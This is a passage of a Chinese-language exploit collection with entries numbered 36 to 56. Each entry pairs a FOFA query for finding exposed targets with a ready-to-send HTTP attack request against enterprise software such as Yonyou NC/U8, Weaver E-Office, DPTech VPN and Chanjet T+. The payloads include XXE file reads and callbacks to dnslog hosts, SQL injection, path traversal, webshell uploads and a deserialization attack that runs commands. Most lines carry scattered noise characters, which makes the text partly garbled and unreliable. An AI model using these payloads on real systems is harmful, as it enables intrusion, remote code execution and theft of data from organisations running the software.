3 ~4 p2 O: D% n# A3 D! e9 Y6 W8 pHost: 203.25.218.166:8888
4 `! S9 N# N% P) pUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info0 F- r% \9 J( E, Z1 r: t! H: b
Accept-Encoding: gzip, deflate
! }0 e) I# H( G4 J. U4 Q4 RAccept: */*
5 S4 i0 A; {3 s7 @Connection: close9 j$ C6 t7 G( d8 d
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
; z v- v( `% v) k7 LContent-Length: 190" Q7 h, y3 s: }; t! R$ x/ J" ~
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
. u3 J; ^- {3 Y% \" z. u, B* M8 k: d' Q# g4 ~- F: a3 r0 @& o9 S
--fd28cb44e829ed1c197ec3bc71748df0
# l2 t0 \/ m. ]0 p4 k2 c8 X5 |Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"$ d% [- a9 B3 ~- s; u) ?
/ }$ P9 ?' K6 A5 @) b
<%out.println(1111*1111);%>
' S9 Z# i& Q& Z--fd28cb44e829ed1c197ec3bc71748df0--8 I$ D* L0 w& ]( @- l7 z5 z- E
! s8 F. @. R, W6 ~" i
6 }) p6 w6 J3 T/ B7 Q0 m; u! b36. 用友NC-Cloud soapFormat XXE' g3 B, i1 V: x& P
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"( U( p) G' |! s$ |' U( P
POST /uapws/soapFormat.ajax HTTP/1.1
5 j* `- e( r) V( E( |, uHost: 192.168.40.130:8989% I4 p! I2 j& K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0, k' }& K1 |3 H" G8 J( v
Content-Length: 263 A5 h7 i# O i1 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ _9 ~+ r9 |: a6 l7 z' u! mAccept-Encoding: gzip, deflate
) b; |9 e- p$ k, z* j" ] qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ J2 m- ^9 k+ N7 D9 `& P$ V% R
Connection: close
8 U% A5 L8 u* o! aContent-Type: application/x-www-form-urlencoded
& A" A, H! Z- ^$ {# {Upgrade-Insecure-Requests: 1 Q/ C: U t6 y" a ^$ ~1 |% c
H' r8 \: T! N$ _; U' |8 _msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
r1 Y) b* Q2 W: X9 B B7 F- s* E) j! U/ d
) k" T' d) m( h/ G37. 用友NC-Cloud IUpdateService XXE
5 ^3 l' u7 a2 h v. E0 w- ?FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"% l) n$ o6 [6 X5 ~9 X. t, q
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
+ K5 T- l5 A. g! U2 }8 e3 g& T3 _" FHost: 192.168.40.130:8989
6 [- m4 b+ i9 [ e8 ?& k( e4 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
8 c! P. h; e }+ d& n2 K VContent-Length: 421" C) R: r" o+ Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ F2 V. A% w2 W' |
Accept-Encoding: gzip, deflate& L5 B1 g+ I# @! {
Accept-Language: zh-CN,zh;q=0.9
) P5 |" e/ Y4 @7 b3 K4 _! t& b! E6 yConnection: close
" ?9 R/ d* B; N' L, f( vContent-Type: text/xml;charset=UTF-8
: ?# w+ E& a& Y. GSOAPAction: urn:getResult
) P' ~* O6 U! T6 C0 v& F! yUpgrade-Insecure-Requests: 1* p, z( d0 |! g& \
6 G: {2 |/ J. `/ v: L9 V4 s
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
]7 R2 A: c7 Y3 g" d<soapenv:Header/>
" |/ b' Y. u4 f<soapenv:Body>
6 k; b+ h9 J, }$ N' s<iup:getResult>
0 R J4 P, J, V* R4 p# o$ H<!--type: string-->0 D7 G9 B9 h2 ]* M/ ]: K, B- K
<iup:string><![CDATA[
3 ^: l- o" Z. l; ]9 _5 W<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
# X2 ~ q/ @. C. e7 {<xxx/>]]></iup:string>" O3 R" q. w6 ]- n, A( u' l; h
</iup:getResult># C/ c. n; r: t! k" |: A
</soapenv:Body>) \% e' v ~: }# g. Z' m
</soapenv:Envelope>
0 W0 e; b9 y/ r9 S
( l) s7 \6 E9 W
5 [" i6 H3 i3 A5 r7 c" V: X+ `% R m6 b0 [6 ?- f
38. 用友U8 Cloud smartweb2.RPC.d XXE3 ?+ z6 N0 B8 U2 L3 u
FOFA:app="用友-U8-Cloud"; D6 Y/ {( O# [
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
8 B. i, Q( @7 R _Host: 192.168.40.131:80889 S6 z( Q! ^7 L* p1 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.255 y$ ]: p4 l! Y; y% ?& i: G3 B6 C
Content-Length: 260
) B! ]- q& n: g$ {7 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
7 ?0 l/ l) o. f; b4 I, [* e' BAccept-Encoding: gzip, deflate
1 |8 r' r n: h) D. i! ^. e! q) GAccept-Language: zh-CN,zh;q=0.9
5 n5 b/ s$ N0 {1 UConnection: close2 A- B% U3 k q$ s2 Q
Content-Type: application/x-www-form-urlencoded/ h7 D' e7 G: [, a0 T1 j
" f) f! {4 O, ^5 M__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
$ U: }( \ y6 B' ~) ~2 S+ b. _8 ^# |; S1 d8 m: @
' \" A+ F3 |3 M' U% S
39. 用友U8 Cloud RegisterServlet SQL注入- q" \% b- K% ]2 e l2 D; S [
FOFA:title="u8c"% `( S" K+ j7 r0 q# t
POST /servlet/RegisterServlet HTTP/1.1
5 l3 }$ G' z" G$ jHost: 192.168.86.128:80891 R6 q/ I* r9 l8 y$ u* b8 q/ \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( |9 H' h& O; _1 R. Q" f9 \Connection: close3 M* C, H) z5 M1 [7 j
Content-Length: 85/ @* O, q: H" Q! [6 y
Accept: */*
' K% X8 j R! @8 N/ TAccept-Language: en! F1 U8 T& R$ y& t2 \+ P
Content-Type: application/x-www-form-urlencoded2 @, s& S( W5 [: z/ ]
X-Forwarded-For: 127.0.0.1
9 m" s' X: s# K, G5 IAccept-Encoding: gzip
; r- T o$ S _; {/ f# Q7 L" ~$ `, t1 H2 T {: R5 x1 U
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--6 K8 D3 T! h. n4 m1 q5 F
$ M" ^5 ?1 v% U# |4 ~& ~ a
~( t5 ~2 Z" Q3 X1 T9 s40. 用友U8-Cloud XChangeServlet XXE' {) E) G, C! m) v
FOFA:app="用友-U8-Cloud"' O" K8 c3 w, O! {* ]( v
POST /service/XChangeServlet HTTP/1.1
4 c K8 r0 S. g3 E: L! [$ I& `2 J" ^Host: x.x.x.x; e8 U2 s) b+ F: q9 t$ \! L4 P" Z6 Q
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 Y5 D0 ]3 U; i
Content-Type: text/xml& k8 ^. V# e% H: x( l
Connection: close6 f, n* T! E$ _8 v2 [, h) ^) w
7 Y0 q, _, ?6 a, h3 e' b<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
2 U- \" m6 [% f, N* k% B; y5 N/ o4 l1 _
. z8 \+ T& P$ b
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
: S; E# t1 j; l2 O' YFOFA:app="用友-U8-Cloud"
- j& [" a: C' o p" d ]4 Q2 f* EGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
" k: \" ^6 ?1 l6 C- wHost:! y0 g: O. e2 W- J; m( R; H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- l7 F3 y, d8 {8 m+ c- h) t, w5 q
Content-Type: application/json5 _2 Y* Q& l" U9 \, c% f( t5 y
Accept-Encoding: gzip9 Q/ h' q% t' q4 G6 m/ _ d
Connection: close
) \' j) O: S! V' H6 e
7 {1 D/ {4 x8 `4 k: ^+ v, r/ K( Y9 ?- |! H2 o- G* Q
42. 用友GRP-U8 SmartUpload01 文件上传 _! b7 l( w! Z# E/ N% a
FOFA:app="用友-GRP-U8"
( u4 q8 O2 I. t/ l' sPOST /u8qx/SmartUpload01.jsp HTTP/1.1/ N( U) G' r) T, C- E
Host: x.x.x.x t1 I) z9 C& L2 q' T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt% k) e* o3 q; E7 H+ }1 O0 \8 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
2 F# T' ^$ G! K- N. X. P/ W7 \ N$ E$ y- X
PAYLOAD8 E2 v7 O# q9 g% H& q# \
2 t9 X) j( T" a0 Q$ e' V6 C; S
5 o6 v8 _& w- h$ z: [! W$ Xhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml2 g$ M w9 {6 A8 a3 x
; X; y% v" e& W6 f, T& H% U6 ^
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
* e+ l, _+ ]% D" o" ?5 B# z) e3 EFOFA:app="用友-GRP-U8"3 J i6 L( W3 m* b" m
POST /services/userInfoWeb HTTP/1.1; l% A' V. F7 F7 F$ J
Host: your-ip/ E& l# S0 M6 n( [9 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36& |/ J3 K. w9 F: o& @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ R3 u% V% l* x& w) ?1 aAccept-Encoding: gzip, deflate
) [; ?4 v$ F4 R b) D3 K+ VAccept-Language: zh-CN,zh;q=0.94 ]# [$ r% I! e. t- r, R+ z
Connection: close
" Y2 O& [( c7 }, H7 NSOAPAction:) b% k, R0 }- V- O- c: x
Content-Type: text/xml;charset=UTF-8
! x. i& w' V* j7 {' j; j& a1 q" j: q8 |' X8 V/ w1 h( q2 `4 W& B; P1 V
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
* E3 K/ {0 J5 }+ K) ^ <soapenv:Header/>
+ X, z( I* `7 a" v9 V <soapenv:Body>) d, |+ P9 h$ B' a) C
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">2 r& B, k; N- Z' b8 m* B
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
) S; ?1 x7 c* Y+ N' k8 u </ser:getUserNameById>
/ e; |2 r- g8 J% H </soapenv:Body>
" M+ z- `& q) V' s* Q9 B+ ^</soapenv:Envelope>& c4 p$ v2 W2 r' e. ]
4 K l3 L7 z& u9 C* R) U( I# o( Z
44. 用友GRP-U8 bx_dj_check.jsp SQL注入- K! ]" M4 L9 m; B7 j
FOFA:app="用友-GRP-U8"
" ~' T2 n) x* f- {# y, \/ V- Y* q. QGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1# T& Z/ c4 C6 e3 \: f, y
Host: your-ip: q" E/ Z) F, z6 l; x& x) B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36( n9 L6 Z1 e, a" j* d& P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 \$ B( ?. q6 y' w4 d# R9 |Accept-Encoding: gzip, deflate! `' M: n/ X3 m6 C1 ~2 k) ]4 v
Accept-Language: zh-CN,zh;q=0.99 _* H* B" l5 ]. B9 h w3 W
Connection: close
- S- E! W" O" H# f! x; y) R
) U w5 ?% [# k0 D' |+ D/ P& J( h1 z% F V( T T
45. 用友GRP-U8 ufgovbank XXE0 f( o. L' _: y* l4 k
FOFA:app="用友-GRP-U8"
4 o, I$ O+ m v, I- n& oPOST /ufgovbank HTTP/1.1/ j6 y( a# {, Y3 M7 j6 T3 ^& V
Host: 192.168.40.130:222) x" x3 F4 E# v d1 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.02 g) T+ s/ u0 q
Connection: close6 Z: Z. p8 a3 K% K2 K1 @) T- a
Content-Length: 161
% u5 |0 b0 ]8 ]7 y- eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- H6 U/ z3 g* ]% GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ c3 X' L) ~, N* Y4 _
Content-Type: application/x-www-form-urlencoded
& k$ o0 l% }% e. ?# HAccept-Encoding: gzip' M, L4 y% C4 a: I
9 m% E; I6 h; a; P
reqData=<?xml version="1.0"?>3 n) ~& {8 }1 m: i- Z: K
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest3 w8 o, Z! x/ G: Y& q7 }% a" h
5 S! X( y0 X$ ] t F& N% b o; f$ G, E; A
46. 用友GRP-U8 sqcxIndex.jsp SQL注入; R7 H' t4 [# f' i4 u) C5 {
FOFA:app="用友-GRP-U8"
2 a$ M, I5 c$ K" n" U/ @GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1- v7 r' s1 Y! `" _7 x3 A, p! K: v
Host: your-ip& s: U, M6 g0 w& U! G$ q* ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
# S9 E x4 K# M, W$ Z4 d4 _' gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ w6 C7 ?0 A a& [3 E
Accept-Encoding: gzip, deflate7 I* ^1 g7 r2 z! j
Accept-Language: zh-CN,zh;q=0.98 i( v0 A/ Z, w# j1 p
Connection: close" x: r# D" r$ }/ a [2 ~
1 N: G& U, r! \ l; Q; D
( K/ u; n* h9 L$ E8 F/ ~8 r9 d
47. 用友GRP A++Cloud 政府财务云 任意文件读取2 j0 c. ^3 m, L, ]9 T M! l( ^9 [- _
FOFA:body="/pf/portal/login/css/fonts/style.css"$ E: B& S0 D6 Z
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1# |4 C2 \4 X3 I1 N
Host: x.x.x.x
5 l& Q& f# g& e, u8 T1 X$ E* t/ uCache-Control: max-age=0
/ I* V& j1 g6 M! a4 OUpgrade-Insecure-Requests: 1) G, v( @, N& J7 S# M) K/ T2 I7 p' q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 }# J0 n' w5 i% d! Q& r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ L7 K. e' F' e
Accept-Encoding: gzip, deflate, br
3 F4 v1 B) \8 x1 vAccept-Language: zh-CN,zh;q=0.9
. T$ Q% v4 y3 Z1 zIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
9 n) ^5 B( D+ h, w+ V' tConnection: close8 |0 }0 Z. B1 C2 q. Q! @5 K
- [3 K% u b0 N# R3 t6 O n1 J1 H. c# V+ b
) e$ \6 X" e2 c$ u" c48. 用友U8 CRM swfupload 任意文件上传( g6 t5 y- V! r8 X& Y* w: N
FOFA:title="用友U8CRM"
" e+ ^7 S. j+ `8 S- MPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
( N" A" E3 M2 Y* S/ A* lHost: your-ip
6 f% o( Y+ L7 B- y7 N+ t1 w" U1 n( pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 ]% { ], T: l# \) y5 n" M; ]. R2 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 [8 q `2 C) K5 c7 Q% f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: Y* p0 v, [. y' E9 J% z" _
Accept-Encoding: gzip, deflate
+ h' [2 H" K. d7 {Content-Type: multipart/form-data;boundary=----2695209672394068716424300668557 D# ]' U4 A% a* N/ ?4 I
------269520967239406871642430066855
1 C `- |% y1 I5 m: U' kContent-Disposition: form-data; name="file"; filename="s.php"
; s6 ]6 l( u9 {4 P% S12311 H+ K5 b, p# i# p" P
Content-Type: application/octet-stream' |5 f' |, p) F$ @- X
------269520967239406871642430066855
. r' S8 k% t- ] v: BContent-Disposition: form-data; name="upload"" y1 w H8 C* |, [
upload- P8 T1 V% w* O+ M, c$ a+ b# L" ], z/ l
------269520967239406871642430066855--$ B" }4 F# u0 G. X
7 j6 b, p9 I# e
# X" I, L: B! C1 L) X9 O49. 用友U8 CRM系统uploadfile.php接口任意文件上传
3 x0 }8 g. P+ x3 b1 yFOFA:body="用友U8CRM"7 p) l" g/ j8 @9 u& X7 q4 v. o
O( k9 j; V) [POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
7 c a( n- t, s3 m6 pHost: x.x.x.x/ _$ N6 D4 |0 z3 n, E \ S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 u; P" A' W& N( y# G+ T
Content-Length: 329
' R" x$ U' F" S% ?( H' l4 l8 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 w$ \ J3 E8 n3 q; g4 sAccept-Encoding: gzip, deflate
n$ E, U" D: S6 p/ EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 B! J. V# N' B3 u% J! [1 P5 V
Connection: close+ D& Q/ I, H7 _( U; E
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
- g5 m, k" h) i+ f/ e& V, ]0 x4 K0 u
-----------------------------vvv3wdayqv3yppdxvn3w1 R: G. W3 ?4 i) o4 C+ \' m3 a
Content-Disposition: form-data; name="file"; filename="%s.php ". V9 F7 n- R" G' F+ G$ ]
Content-Type: application/octet-stream+ ~; f3 K, u% ^/ F1 x
/ n. d& G5 t( n. j/ H! q
wersqqmlumloqa# ?- J! ^+ ?* Q) x* j
-----------------------------vvv3wdayqv3yppdxvn3w8 w3 b9 c6 o/ N
Content-Disposition: form-data; name="upload"3 r( }/ g9 C# f' g: g1 X1 k
$ A2 }% h6 N+ K3 jupload
6 D8 p+ b R+ E. w/ Y7 F-----------------------------vvv3wdayqv3yppdxvn3w--5 V; }: L [4 p/ H
: W) M# E' {5 Z9 q
$ u1 }9 m7 V7 R/ ?7 \& ^1 h [http://x.x.x.x/tmpfile/updB3CB.tmp.php
4 i9 b3 W& o! Y$ A) O j9 r' V. x; s. Y7 Q$ W0 Y
50. QDocs Smart School 6.4.1 filterRecords SQL注入9 G: @9 ?/ N5 k. x( y
FOFA:body="close closebtnmodal"+ b# h/ e* w% X+ x2 e( D( } m
POST /course/filterRecords/ HTTP/1.1; N0 M) @, |) W, \/ g
Host: x.x.x.x
$ V" u; c2 C) ]9 W$ h' }User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 U6 t, x9 ?" @4 T$ N; x) SConnection: close0 l* ]# o+ G7 I, z4 o7 I% @) q0 I
Content-Length: 224
+ t( m1 ^* K1 t: c1 {Accept: */*
* x! T% Z1 ?, z3 R7 m% oAccept-Language: en" b, H) ~+ | c3 U$ d
Content-Type: application/x-www-form-urlencoded
1 M0 M# Q+ h! B- j$ K# E7 w6 iAccept-Encoding: gzip
! i7 c0 {; _0 `0 H, E
/ m2 S0 K: j+ d7 M2 N/ osearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=12 d9 D$ `& b! G" J
, P3 Z; K( e1 Q# [8 g
1 ?6 E7 W( u+ w; ]7 T51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
. F9 L( V T7 L2 r/ ~: @7 Z+ kFOFA:app="云时空社会化商业ERP系统"# T) I+ z, I/ F( L9 v% ^& h! v5 |
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
4 x. _) \. z* fHost: your-ip
+ n: ]# A7 M3 [ b- O. QUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
; n. T" j o; W" u2 }& l0 m4 z0 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
% j+ z8 t, _- u1 [8 L1 T/ B9 P( f# OAccept-Encoding: gzip, deflate
+ Z0 ?" P; E/ L$ V4 PAccept-Language: zh-CN,zh;q=0.9 a! w; L9 J$ U. O4 _( Q( @5 l/ C
Connection: close9 m- p% L, L& v; G& S. @8 H
1 b' q* F# q- h+ K" _2 q2 J2 N. w, ?+ [- I- d& w
52. 泛微E-Office json_common.php sql注入
3 o" j) M- v8 w4 ]/ IFOFA:app="泛微-EOffice": c/ N+ K: Q) f
POST /building/json_common.php HTTP/1.1
5 G) g0 W, i( r' H- THost: 192.168.86.128:80971 B O. [% g k6 V# ?9 N
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" h; C, r# m, F0 J% ]1 gConnection: close
; _- y# I/ g' |9 zContent-Length: 87
3 G7 H# }1 c) m1 r% w" J6 vAccept: */*
- t) `; _) F$ W# W9 N+ NAccept-Language: en0 d+ N! V7 E. o( w J
Content-Type: application/x-www-form-urlencoded3 p; n: |$ `& m8 D+ j4 ]) s6 s
Accept-Encoding: gzip( j* Y* W7 @) y9 @8 f4 X7 a7 s8 H
- _6 X9 z( N2 Gtfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
5 o: M5 @% }! I5 {7 S4 B8 `+ F& g: p, Q& t; ?( x
$ E; G9 {7 r; J+ P" f6 k- J
53. 迪普 DPTech VPN Service 任意文件上传
9 p/ h% Y& S( u$ [! y; a( J/ k" pFOFA:app="DPtech-SSLVPN"
& K& L( c& a! J- V2 M/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd, e: n; j7 i. s# ?
N3 e& ?2 u+ B
9 E5 t" Y4 M7 o9 H# Z54. 畅捷通T+ getstorewarehousebystore 远程代码执行/ K9 U3 I, r$ f5 n' w
FOFA:app="畅捷通-TPlus"$ x6 X! W/ P% w, V6 Z
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
- `$ g" v8 `+ j: d6 L: N$ ^/ s5 u"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"6 T4 J+ d/ A) ?2 ^
: A; e: o% H# f) x# [4 D4 r1 g8 T1 L8 i2 X+ W; Y1 b
完整数据包: g& d( A$ U# Y" T
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
4 {, J- x+ ]4 }* D( n& z% m- ^Host: x.x.x.x
4 i7 H$ ]6 A( D/ i5 A E6 X: W! UUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F6 H5 E$ o, \3 g/ g
Content-Length: 593
4 y/ ]# m9 K/ h' U5 A
, s% t) i& I6 A" [; K{, | U6 `6 J: B- E
"storeID":{
3 h8 m4 x# `/ c: D "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",5 e$ z! i8 V: ~# B0 v& L; ^9 j g
"MethodName":"Start",) e, F6 m m, Q: r
"ObjectInstance":{
1 h4 K% ~8 n9 \2 S2 H j5 Y( O "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
. p3 a# ~6 }$ j "StartInfo":{
0 U: d! u: F0 L "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 v! u; A1 X: y- Q8 r S
"FileName":"cmd",; |* n8 [* w0 M) t* T
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% `2 ?, \) k* i- @
}
! h1 ^( J: C$ }& f2 K7 T, M& B3 F }6 l3 d( [: Q' J8 v/ ?# M9 r
}* K7 `) ^' O1 z
}
3 ^* z1 j- v3 i: b/ `( \. x9 Z/ h8 _% K7 L5 G! s3 w' k/ u
9 O7 i a. R, h) y
第二步,访问如下url
8 I5 _: j- q8 i" G- R/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
9 S8 |" j/ o/ D8 @# u, D
5 v! D, {' M d8 T4 Y$ l2 O% n# B0 V: S) [7 b4 w
55. 畅捷通T+ getdecallusers信息泄露- s6 c" I: G/ X
FOFA:app="畅捷通-TPlus"& u" w* ^6 l1 u1 y
第一步,通过
- j3 R) j( m* t0 r2 P. h+ U" y$ `/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
8 D6 U) F3 w; z- o( t1 G第二步,利用获取到的Cookie请求2 B' h; v' J, o: O7 ^
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers, k+ B$ m4 o9 K
5 ~% y+ t4 O+ M4 c( ?8 z+ U56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
3 D4 q" x8 E" ~6 e/ ^FOFA: app="畅捷通-TPlus"
; V1 G8 I1 v* q. R) C9 z$ JPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
" E, W! ?' c0 J) D: WHost: x.x.x.x
! e# V- D. i* A* rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
